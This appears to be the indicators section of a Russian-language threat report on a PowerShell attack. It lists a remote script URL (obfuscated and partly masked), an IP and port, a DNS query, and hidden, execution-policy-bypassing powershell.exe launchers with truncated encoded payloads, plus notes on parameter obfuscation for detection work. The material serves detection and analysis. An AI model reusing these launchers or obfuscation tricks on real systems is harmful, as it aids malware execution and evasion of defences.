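Техническая информация
Примечание: в командных строках PowerShell ниже имена параметров сокращены и записаны в смешанном регистре (-WIND — -WindowStyle, -cOMMaN — -Command, -ec — -EncodedCommand, -exEcUtiOnpOliC — -ExecutionPolicy), поэтому правила обнаружения должны сопоставлять параметры без учёта регистра и по допустимым префиксам, а не по полным именам. Код команд закодирован (шестнадцатеричная строка внутри выражения -JOIN либо Base64 в аргументе -ec) и в списке обрезан («...»), так что для анализа нужны полные командные строки или журнал Script Block Logging.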
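- h+t+t+p+:+/+/+a+p+p+-+d+o+c+-+a+d+m+i+.+c+1+.+b+i+z+/+l+o+c+a+l+.+p+s+1 (URL, символы которого разделены знаком «+»; обычный поиск по подстроке URL такую запись не найдёт)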
- '<LOCALNET>.0.64':444
- http://ap####c-admi.c1.biz/local.ps1
- DNS ASK (DNS-запрос): ap####c-admi.c1.biz
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WIND hIddEn -cOMMaN "(-JOIN(('5365542d5641724961624c45206137576b716930334261627520333b7365742d5641526941424c6520463252744e577672766545552036333b7345542d5661524941624c45204458714e3669347a6b7559...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WIND hIddEn -cOMMaN "(-JOIN(('5365542d5641724961624c45206137576b716930334261627520333b7365742d5641526941424c6520463252744e577672766545552036333b7345542d5661524941624c45204458714e3669347a6b7559...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noNi -NolOGo -NoPRoFi -WInD hIdDeN -exEcUtiOnpOliC bYpAss -ec cwBFAHQALQBWAEEAcgBpAGEAYgBsAEUAIABqADUARQBFAE4AegBWAHoANQBHAEkAeAAgADMANwA7AHMARQB0AC0AVgBhAHIAaQBBAEIAbABlACAAVgBIADgASQAxAEEAaQ...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nONinT -NOlo -nOpROF -WiNDo hIDDen -eXEcutionpoLI bYPaSs -ec KAAtAGoATwBJAE4AKAAoACcAMgA0ADUAMAA0ADEANgAzADYANgA0ADYANwAxADcANgAzADQAMwAzADQAOQA1ADIAMwA2ADMAZAAyADgANgBlADYANQA1ADcAMgBkADQAZgA...